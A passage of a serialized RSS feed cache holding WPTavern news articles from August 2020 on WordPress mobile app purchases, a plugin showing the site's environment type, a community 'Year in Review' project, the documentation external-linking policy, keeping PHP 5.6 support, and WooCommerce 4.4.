and simplicity, WordPress&rsquo; official mobile apps need to be free from commercial interests.</p>\n\n\n\n<p>John James Jacoby suggested Automattic build a new app for its own products if the company wants to add in-app purchases. Mullenweg seemed open to considering the idea.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">We can do that but would probably need to spin up new app under a new developer account, and disable webviews.</p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/1296915015845388288?ref_src=twsrc%5Etfw\">August 21, 2020</a></blockquote>\n</div>\n\n\n\n<p>At the moment, given Apple&rsquo;s apology, the liberation of the mobile apps is no longer a matter of immediate necessity. Mullenweg seems satisfied with the outcome for now, but the original conflicts of interest in the app remain.</p>\n\n\n\n<p>&ldquo;I did not expect the previous tweet to get attention outside the WP community,&rdquo; Mullenweg said. &ldquo;My understanding was the previous decision was final, and we had already made many of the arguments people suggested privately over the several weeks the app was locked.</p>\n\n\n\n<p>&ldquo;We will continue to be responsive and do our best to be within both the spirit and letter of the app store rules, including closing any webview loopholes that pop up. This also made me appreciate the freedom of the open and independent web.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 24 Aug 2020 23:53:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: New Plugin Displays WordPress Environment Type for Admins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103676\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:179:\"https://wptavern.com/new-plugin-displays-wordpress-environment-type-for-admins?utm_source=rss&utm_medium=rss&utm_campaign=new-plugin-displays-wordpress-environment-type-for-admins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3118:\"<p>One of the minor but useful additions to WordPress 5.5 is the new <code><a href=\"https://make.wordpress.org/core/2020/07/24/new-wp_get_environment_type-function-in-wordpress-5-5/\">wp_get_environment_type()</a></code>&nbsp;function. It makes it possible for plugin and theme authors to do some interesting things based on whether a site is identified as staging, development, production, or some other custom environment type. In discussion on the original trac ticket, Marius Jensen suggested a few ways this function could be useful: </p>\n\n\n\n<ul><li>It&rsquo;s a function used for grabbing the current environment, this is to ensure everyone fetches the values the same way (to avoid using different terms and such).</li><li>Outbound emails could be filtered, and if&nbsp;<code>get_environment()</code>&nbsp;isn&rsquo;t set to&nbsp;<code>production</code>&nbsp;then send them to the developer, allowing for legitimate email tests in stage setups without worrying about emails reaching end users.</li><li>API endpoints where you want to use a test endpoint when not in production to prevent data pollution.</li><li>Providing a wp-admin notice for non-production sites so it&rsquo;s much clearer that what you are doing now will/won&rsquo;t affect the site your business relies on.</li></ul>\n\n\n\n<p>The new function is already getting put to use in WordPress developer Roy Tanck&rsquo;s new plugin called <a href=\"https://wordpress.org/plugins/display-environment-type/\">Display Environment Type</a>. It adds a prominent red notice to the top of the admin for Production. Custom environment types will be set to blue with a lightbulb icon. (The colors used in the plugin are fixed and not configurable to help avoid confusion across servers.)</p>\n\n\n\n<img />\n\n\n\n<p>The environment type only displays for admin users. Tankck&rsquo;s plugin also adds the current environment type to WordPress&rsquo; At-a-glance widget:</p>\n\n\n\n<img />\n\n\n\n<p>This is the first plugin on WordPress.org to make use of the new function, but developers are planning to use in other unique ways.</p>\n\n\n\n<p>&ldquo;We are adding our own custom environment vars here at Pantheon so plugin authors have the option of doing this but it would be so nice to have this in core so plugin authors don&rsquo;t need to write host specific code,&rdquo; Pantehon developer advocate John Richards commented on the original ticket for the new function.</p>\n\n\n\n<p>WordPress plugin developer Rene Hermenau said he will be implementing this new concept in his <a href=\"https://wordpress.org/plugins/wp-staging/\">WP Staging</a> plugin in the next update. WP Staging, which is currently active on more than 50,000 installs, allows users to quickly create an exact copy of their sites for staging or development purposes. </p>\n\n\n\n<p>WordPress.com has also <a href=\"https://lobby.vip.wordpress.com/2020/08/20/environment-type-support/\">added support for environment types</a> in VIP Go, allowing developers to run different code for their sites depending on if it&rsquo;s in production, development, or any other custom environment type configuration.</p>\n\n\n\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 21 Aug 2020 21:16:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: WordPress: A Year in Review, New Project to Fill the WordCamp Void\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103672\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:193:\"https://wptavern.com/wordpress-a-year-in-review-new-project-to-fill-the-wordcamp-void?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-a-year-in-review-new-project-to-fill-the-wordcamp-void\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6439:\"<p class=\"has-drop-cap\">Joe Casabona, a freelance web developer and educator, launched <a href=\"https://wpyearinreview.com/\">WordPress: A Year in Review</a> last week. The project was born out of his passion for helping others and a longing for attending WordCamp US, which <a href=\"https://wptavern.com/wordcamp-us-2020-canceled-due-to-pandemic-stress-and-online-event-fatigue\">has been canceled</a> because of the stress of the pandemic and online event fatigue. He wanted to do something to fill in the void.</p>\n\n\n\n<p>His goal is to offer online content that members of the WordPress community may have missed out on in the year. The project will provide learning resources in e-book, print book, video, and audio form. The content will be free, but he is asking community members to chip in and sponsor the project, covering the hard costs of putting it together.</p>\n\n\n\n<p>&ldquo;After WordCamp US got canceled, I started thinking about all of the work that went into it and the amazing amount of content that now wouldn&rsquo;t be created,&rdquo; said Casabona of why he decided to begin this project. &ldquo;I am a big WordCamper and go to between 7-10 per year depending on my schedule, so I&rsquo;ve definitely missed that experience. My main hope is that this can fill in some of the missing content from those canceled WordCamps. I know there are other efforts too, like the workshops the WordPress Foundation is hosting.&rdquo;</p>\n\n\n\n<h2>What the Project Offers</h2>\n\n\n\n<p class=\"has-drop-cap\">The plan for the project is to offer three types of content to the WordPress community for free:</p>\n\n\n\n<ul><li>An e-book that reviews how WordPress changed in 2020, including a print edition.</li><li>An interview series with WordCamp speakers.</li><li>A video tutorial series that focuses on new things added to WordPress in 2020.</li></ul>\n\n\n\n<p>Casabona plans to run between 15 and 20 interviews with people on a special series via his How I Built It podcast. Instead of a formal talk, he wants to provide interviewees an opportunity to explore their own topics. The <a href=\"https://howibuilt.it/wcus-2020-interviews/\">interview application</a> process is open to those who were scheduled to speak at the canceled WordCamp US through August 31.</p>\n\n\n\n<p>&ldquo;The interview series was the first aspect of this project that I thought of,&rdquo; he said. &ldquo;Basically, I will interview people who applied to speak at WCUS 2020 about their talks &mdash; each episode will have 3 interviewees who have the opportunity to talk for about 10 minutes each about their topic. I&rsquo;ll ask them who they are, what their talk was going to be about, and highlight the main points. I&rsquo;m definitely open to ideas depending on who applies and how many people apply.&rdquo;</p>\n\n\n\n<p>Currently, Casabona has booked only a few podcast interviews. He said he plans on reaching out to more contributors, depending on how funding goes and the finalized outline for the e-book and videos.</p>\n\n\n\n<p>He got the idea for the e-book from <a href=\"https://www.macstories.net/\">MacStories</a>. &ldquo;Every year, Federico Viticci puts out an iOS review in conjunction with the iPhone release, exclusively for his members,&rdquo; he said. &ldquo;I think that&rsquo;s such a great resource and feel something like it would really benefit the WordPress community. Since this is the first one I might have some backstory, but it will mainly be a practical reference for people wondering how the popular CMS changed from January to December &mdash; things they might have missed or overlooked.&rdquo;</p>\n\n\n\n<p>If the e-book goes well this year, he will seek to publish it in the following years. The same would hold true for the printed book, which would essentially be the same as the e-book. A print edition would be a nice keepsake for members of the WordPress community. It is something physical, a tangible item that is not made up of bytes stored on a computer, destined for an eventual digital waste bin.</p>\n\n\n\n<p>Casabona plans to run 10 video tutorials. He will release one video each week, starting in mid-October, through the end of the year. At the moment, he is planning to run all of the videos himself but may reach out to others who are better-suited for particular topics.</p>\n\n\n\n<p>&ldquo;The video series isn&rsquo;t a huge departure from the content I put on my YouTube channel right now,&rdquo; he said. &ldquo;I&rsquo;m targeting mostly users and implementors, but there were some cool developer additions in 5.5.&rdquo;</p>\n\n\n\n<h2>Funding and the Future</h2>\n\n\n\n<p class=\"has-drop-cap\">The biggest holdup for the project is funding. Casabona has a goal of $3,000 to cover the hard costs, such as transcripts, editing, and out-of-pocket expenses. Those willing to donate can give a custom amount or make a pledge for one of three tiers  with each tier building upon the other:</p>\n\n\n\n<ul><li><strong>Support &ndash; $5:</strong> Gets your name in the e-book, progress updates, and behind-the-scenes content.</li><li><strong>Early Access &ndash; $5:</strong> Early draft of the e-book, early access to interviews and videos, and e-book of podcast transcripts.</li><li><strong>IRL! &ndash; $19:</strong> A printed copy of the e-book.</li></ul>\n\n\n\n<p>&ldquo;I basically wanted to give the community a chance to pledge and support the project, as well as get a print book if they want it,&rdquo; said Casabona.</p>\n\n\n\n<p>He is also asking for <a href=\"https://wpyearinreview.com/sponsor/\">sponsors</a> to help fund the project on top of the initial goal of $3,000, which would only cover the minimum to produce content on his own. &ldquo;Sponsorship will allow me to put more of my time and resources into the project,&rdquo; he said. &ldquo;All of this money is going into production &mdash; the more funding I&rsquo;m able to secure, the more time and resources I can put behind it. For example, this could enable me to hire contributors, editors for each medium, etc.&rdquo;</p>\n\n\n\n<p>While it may be a bit early, Casabona is already thinking about the future of the project and has plans if he exceeds his funding goals.</p>\n\n\n\n<p>&ldquo;Excess funding will allow me to find and pay more contributors and better position the project for 2021,&rdquo; he said. &ldquo;I&rsquo;d also like to set up a fund to send someone who can&rsquo;t afford it to a WordCamp&hellip;once we start having in-person events again!&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 21 Aug 2020 20:09:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:134:\"WPTavern: WordPress Documentation Team Discusses Modifying External Linking Policy Following Opposition to the Ban on Commercial Links\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103625\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:313:\"https://wptavern.com/wordpress-documentation-team-discusses-modifying-external-linking-policy-following-opposition-to-the-ban-on-commercial-links?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-documentation-team-discusses-modifying-external-linking-policy-following-opposition-to-the-ban-on-commercial-links\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4311:\"<p>Last month the WordPress Documentation Team <a href=\"https://wptavern.com/wordpress-documentation-team-bans-links-to-commercial-websites\">announced a ban</a> on links to commercial websites within the official docs. These include the&nbsp;<a href=\"https://wordpress.org/support/\">HelpHub</a>,&nbsp;<a href=\"https://developer.wordpress.org/reference/\">Code Reference</a>,&nbsp;<a href=\"https://developer.wordpress.org/plugins/\">Plugin</a>&nbsp;and&nbsp;<a href=\"https://developer.wordpress.org/themes/\">Theme</a>&nbsp;Developer Handbooks,&nbsp;<a href=\"https://developer.wordpress.org/block-editor/\">Block Editor Handbook</a>, and&nbsp;the <a href=\"https://developer.wordpress.org/apis/\">Common APIs Handbook</a>. The reason behind the ban was that heavily policing commercial links placed too much responsibility on the documentation team, when they are already working with limited time and resources.</p>\n\n\n\n<p>The decision was instantly controversial, igniting a heated discussion in the comments. A blanket ban on links to commercial sites, without a clear outline of what that includes, was confusing. </p>\n\n\n\n<p>&ldquo;There isn&rsquo;t clarity what will/won&rsquo;t be allowed, you state that the rules are expected to change in the future (more lax after some trial and error), and end users lose in the end as a result of excluding&nbsp;<em>actually helpful information</em>&nbsp;because it&rsquo;s&nbsp;free but at a domain that has non-free content,&rdquo; Core contributor Clifford Paulick commented on the ban announcement.</p>\n\n\n\n<p>The level of opposition seemed to indicate that there may not have been enough discussion up front and that other branches of the WordPress contributor community, including commercial entities who are also contributors, were not considered.</p>\n\n\n\n<p>&ldquo;Discussion on [the] external linking policy is going in the way we wanted to avoid,&rdquo; Milana Cap said during the July 13th docs team meeting. &ldquo;I was thinking to explore a different approach.&rdquo; She gave more background on why the team is reconsidering the ban:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>The reason we didn&rsquo;t want to allow &lsquo;commercial&rsquo; links is to avoid abuse and make it &lsquo;fair&rsquo; for everyone and not promote any product. We also wanted to save time for our members in a matter of maintenance and sort of automate the process. The further and deeper discussion goes I&rsquo;m realizing this will not be possible. It won&rsquo;t be fair, we won&rsquo;t save time because we&rsquo;ll have to do through discussion every time someone suggest &lsquo;commercial&rsquo; link and I&rsquo;m pretty sure we&rsquo;ll never come to agreement on what&rsquo;s &lsquo;commercial.&rsquo; Personal blogs, services, products.. all of it is mixed now. So my suggestion is to allow them all, make process transparent and set strict rules about the actual &lsquo;content.&rsquo;</p></blockquote>\n\n\n\n<p>A Google <a href=\"https://docs.google.com/document/d/1i0ipOTmKPShSIMoFuEXnI3gkOOUrPJb9t4HMf30JWC0/edit?usp=sharing\">document</a> is now home to a collaborative effort on a new policy that Cap says is &ldquo;fundamentally different from&nbsp;previous discussions.&rdquo; The new approach proposes a set of criteria for allowing external links, banning things such as product promotion within the tutorial, affiliate links, paywalls, and tracking. The specific criteria and wording of the new policy are still under active discussion.</p>\n\n\n\n<p>Sometimes it pays to speak up, if you have a strong opinion about a decision. Reconsideration of this external linking policy is the direct result of feedback on the initial controversial decision, even after it seemed to be final. This may result in a better solution for all stakeholders involved in this discussion. </p>\n\n\n\n<p>Next week the Documentation Team will be hosting a Zoom call to discuss the <a href=\"https://docs.google.com/document/d/1i0ipOTmKPShSIMoFuEXnI3gkOOUrPJb9t4HMf30JWC0/edit?usp=sharing\">proposal</a> they have been collaborating on in Google docs. This meeting is for anyone who is interested, not just Documentation team members. If you want to get in on the discussion, check out the <a href=\"https://doodle.com/poll/v8yy7auidw3mm6q2\">Doodle poll</a> for the proposed dates and times.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Aug 2020 23:37:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"WPTavern: No Minimum PHP Version Bump This Year, WordPress to Support PHP 5.6 for a While Longer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103611\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:235:\"https://wptavern.com/no-minimum-php-version-bump-this-year-wordpress-to-support-php-5-6-for-a-while-longer?utm_source=rss&utm_medium=rss&utm_campaign=no-minimum-php-version-bump-this-year-wordpress-to-support-php-5-6-for-a-while-longer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6967:\"<blockquote class=\"wp-block-quote\"><p>We should be leading the users, not following them.<br />We should be guiding the users, not coddling them.<br />We should carve out the road to the future, not continue to fix a broken road to the past.<br />We should say what we do and do what we say.</p></blockquote>\n\n\n\n<p>Juliette Reinders Folmer wrapped up her final thoughts on a <a href=\"https://core.trac.wordpress.org/ticket/51043\">ticket she had opened</a> a mere three days ago. She had opened the ticket in anticipation of movement on WordPress&rsquo;s minimum supported version of PHP. She had opened it after seeing the plan to no longer support PHP 5.6 in the <a href=\"https://make.wordpress.org/core/2020/08/13/wordpress-5-6-release-planning/\">WordPress 5.6 release plans</a> (note that initial release plans are not necessarily set in stone).</p>\n\n\n\n<p>There is no denying the symmetry of dropping support for PHP 5.6 with the release of WordPress 5.6. Fate seemed to be calling down, saying that it was time to move past the platform&rsquo;s support of a version that reached End of Life in December 2018. It would be a nice sendoff, a farewell that could usher in a new era of maintaining some semblance of staying up to date with the latest and greatest the programming language has to offer.</p>\n\n\n\n<p>But the excitement was cut short. WordPress developers, especially those who have longed for WordPress to be more proactive in updating its PHP requirements, will have to continue pushing for modernization into 2021. It does not look like it will happen this year.</p>\n\n\n\n<p>Matt Mullenweg, WordPress co-founder and project lead, <a href=\"https://core.trac.wordpress.org/ticket/51043#comment:7\">closed the ticket</a> a few short hours after its opening. &ldquo;Just so we don&rsquo;t cherry-pick stats to make a point, it&rsquo;s worth noting that the PHP distribution across all WP sites we track is the same as when that post was made in 2018: 85% are 5.6 or above,&rdquo; he wrote. &ldquo;Only about 66% are 7.1 and above.&rdquo;</p>\n\n\n\n<p>WordPress has required a minimum of PHP 5.6 since its version 5.2 release. Of the WordPress installs on versions 5.2 through the current 5.5 only 10.69% of those are running PHP 5.6, according to Sergey Biryukov, a core committer for WordPress. This percentage is even lower than when the team flipped the switch to PHP 5.6+.</p>\n\n\n\n<p>&ldquo;Given that we&rsquo;re still releasing security updates for WP 3.7 (released almost 7 years ago), it&rsquo;s not like we&rsquo;re leaving PHP 5.6 or 7.0 users without security updates, they just won&rsquo;t have some latest and greatest features of WP 5.6+, which seems fair,&rdquo; <a href=\"https://make.wordpress.org/core/2020/08/13/wordpress-5-6-release-planning/#comment-39483\">he said in the comments</a> on the WordPress 5.6 announcement.</p>\n\n\n\n<p>&ldquo;This is <em>obviously</em> a key philosophical decision that should be made by the project lead,&rdquo; <a href=\"https://twitter.com/nacin/status/1296323839379402752\">tweeted</a> lead developer Andrew Nacin. &ldquo;And for what it&rsquo;s worth, our philosophies and standards on this have been consistent for more than a decade. The numbers strongly suggest it&rsquo;s too early to drop PHP 5.6.&rdquo;</p>\n\n\n\n<p>While there are certainly arguments to looking at the data in different ways, one of WordPress&rsquo;s guiding philosophies has been making the platform accessible to as many users as possible over the years. This has meant taking a slow, deliberate approach while also reaching out to web hosts and users alike. Dropping support for old versions of PHP has not been nearly as fast as some &mdash; including me &mdash; would like.</p>\n\n\n\n<p>The need for updating the minimum version of PHP is not simply about developers wanting to use the newest and shiniest tools. There are practical concerns. PHP 8.0 is slated for release on November 26, 2020. Regardless of WordPress&rsquo;s minimum required version, it must also work with the most up-to-date version of PHP. The wider the range of versions that the platform supports, the harder it is to test.</p>\n\n\n\n<p>Such is the case with PHPUnit, a testing framework for PHP applications like WordPress. PHPUnit 8 supports a minimum of PHP 7.2.  Technically, it has syntax that requires PHP 7.1 &mdash; hence, the need for the WordPress version bump.  PHPUnit 9 requires a minimum of 7.3 and is necessary for testing PHP 8.0 compatibility. There is an <a href=\"https://core.trac.wordpress.org/ticket/46149\">open ticket</a> for solving issues with PHPUnit testing where the team is exploring options to support the range of PHP versions.</p>\n\n\n\n<p>&ldquo;We also need to work on our messaging around these PHP and core upgrades, so we don&rsquo;t cry wolf and cause these notices to be ignored,&rdquo; continued Mullenweg in his explanation for closing the ticket, pointing to the current site health messaging in WordPress. &ldquo;They do not say what version it is currently on. They do not provide a good way to contact the host. They do not give accurate information about security, as most hosts run backports that patch security on older versions separate from what is officially supported by the core PHP project. These are not free upgrades, and I think the cost vs what we are able to deliver to users, vs the hard caused by leaving so many people behind, needs to be seriously weighed. Right now it feels like we&rsquo;re a bit trigger happy on these requirements, and I&rsquo;d even be open to rolling some back.&rdquo;</p>\n\n\n\n<p>WordPress may be joked about in &ldquo;real&rdquo; programming circles. Its reliance on outdated tools may be the punchline from developers who are building sites with the <em>Next Big Thing</em>. However, maybe in spite of or maybe because of the platform&rsquo;s reluctance to quickly drop support for older versions of PHP, it has swallowed up 38% of the web. Any project lead would question meddling too much with its leave-no-users-behind formula that was part of the journey getting here.</p>\n\n\n\n<p>It is a tough call for a project lead to make. It is also tough because developers like Folmer have put a ton of work into PHP coding standards tools and do the often thankless job of advocating for pushing WordPress into modern-day coding practices.</p>\n\n\n\n<p>WordPress is in a position where it has some leverage. If the software demands an upgraded PHP experience, it can put its massive user base to work by forcing web hosting companies to cater to their needs. Money talks, and if enough users begin looking for greener pastures, perhaps those web hosts will make some adjustments. That is at least the theory that some in the community share. &ldquo;If there are no consequences to user/host (in-)action, why would they ever bother to take action?&rdquo; asked Folmer.</p>\n\n\n\n<p>It is also a gamble that the WordPress project does not look to be taking, at least for the version 5.6 release.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Aug 2020 20:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: WooCommerce 4.4 Updates Blocks and Centralizes Coupon Management\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103580\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:193:\"https://wptavern.com/woocommerce-4-4-updates-blocks-and-centralizes-coupon-management?utm_source=rss&utm_medium=rss&utm_campaign=woocommerce-4-4-updates-blocks-and-centralizes-coupon-management\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3507:\"<p class=\"has-drop-cap\">Yesterday, Automattic <a href=\"https://woocommerce.wordpress.com/2020/08/18/woocommerce-4-4-is-now-available/\">dropped version 4.4</a> of its popular WooCommerce plugin. The new release is a minor update with the biggest changes around the plugin&rsquo;s blocks and coupon management in the admin. Two dozen people made 450 contributions to the release.</p>\n\n\n\n<p>The WooCommerce team brought several updates to the plugin&rsquo;s blocks. The biggest user-facing change is that the blocks will now use the WooCommerce thumbnail size instead of loading the full-sized image. This change means that images will respect the product image size settings that users can set via the WooCommerce &gt; Product Images section in the customizer. This change will make sites using blocks more performant.</p>\n\n\n\n<p>The block editor should be slightly speedier with this update. The team removed front end scripts that were not needed from the post-editing screen.</p>\n\n\n\n<p>WooCommerce also updated its flagship theme, Storefront, yesterday. There is nothing in the <a href=\"https://woocommerce.wordpress.com/2020/08/18/storefront-2-6-0-release-notes/\">release notes</a> to suggest that the update corresponds with changes in WooCommerce 4.4, but it is a good idea for users to stay updated regardless.</p>\n\n\n\n<h2>Coupon Management Moved to the Marketing Hub in the Admin</h2>\n\n\n\n<img />WooCommerce Coupons admin screen.\n\n\n\n<p class=\"has-drop-cap\">In WooCommerce 4.1, the team added a new Marketing section in the WordPress admin. When it was initially launched, some users felt like WooCommerce had added a top-level menu item for little more than the purposes of upselling its extensions. The single admin screen also offered links backed to the WooCommerce knowledge base. Many comments on the <a href=\"https://woocommerce.wordpress.com/2020/03/31/coming-soon-woocommerce-marketing-hub/\">launch of the marketing hub</a> asked the team to reconsider making it a top-level menu item, at least until it offered something more than upsells and links back to the WooCommerce website.</p>\n\n\n\n<p>Having a centralized marketing location in the WordPress admin makes sense for eCommerce websites though. Creating an online shop is only one part of the process. Successful stores need to have a marketing focus, and WooCommerce is seeking to create an experience that helps more store owners become successful.</p>\n\n\n\n<p>While it is a minor change, <a href=\"https://woocommerce.wordpress.com/2020/07/09/centralized-coupon-management-available-for-testing/\">moving the coupons screen</a> to the marketing hub makes sense. For those end-users who make use of coupons, it should very much be a part of their marketing plan.</p>\n\n\n\n<p>WooCommerce 4.4 still has the legacy coupons screen beneath the standard WooCommerce menu. However, 